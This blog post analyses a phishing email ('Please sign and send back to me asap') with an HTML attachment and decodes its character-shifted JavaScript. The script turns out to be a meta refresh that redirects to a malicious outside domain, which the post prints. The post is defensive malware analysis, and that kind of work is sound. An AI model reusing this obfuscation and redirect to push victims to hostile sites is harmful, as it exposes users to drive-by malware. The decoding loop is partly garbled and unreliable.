Tuesday, September 21, 2010

Html virus inspired by a toy decoder ring

Here's a junior level virus attempt that's inspired by the cereal box decoder ring.
It's much easier to understand, and actually kinda fun to go through.

Subject: Please sign and send back to me asap


Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Forgot the Attachment - Here ya go!

Content-Type: text/html; name="85104attach.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="85104attach.html"

After decoding we have:

[less than symbol] script type='text/javascript'>

var s = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";
m = "";
for (i = 0; i <>; i\<>

m is empty
iterate over the length of s, i is the counter

This is the important part:
m += String.fromCharCode(s.charCodeAt(i) - 1);

pretty basic, shift the letters to the one before
n becomes m, f become e
Looking at
to see what's the order of the punctuation (! becomes space, # becomes ", etc)
The first character = becomes a less than symbol, but I removed it to keep things from executing.

meta http-equiv="refresh" content="0;url=http://partynear.ru" />

This rest is just small stuff to get the script to work. Actually I think the & is put in the wrong place.

m=[28th position] insert an &
m=[23rd position] insert an !

document.write(m) sends the string to the browser. The "refresh" is what makes it all happen.

So what is at partynear.ru?
Not much according to the text only browser Lynx. It says "Unexpected network read error"
jsunpack shows that there appears to be a redirect sending you further into the site into a Themes/card.js area that is trying to run another javascript. It's not clear if this is smoke or malware or something else.

No comments: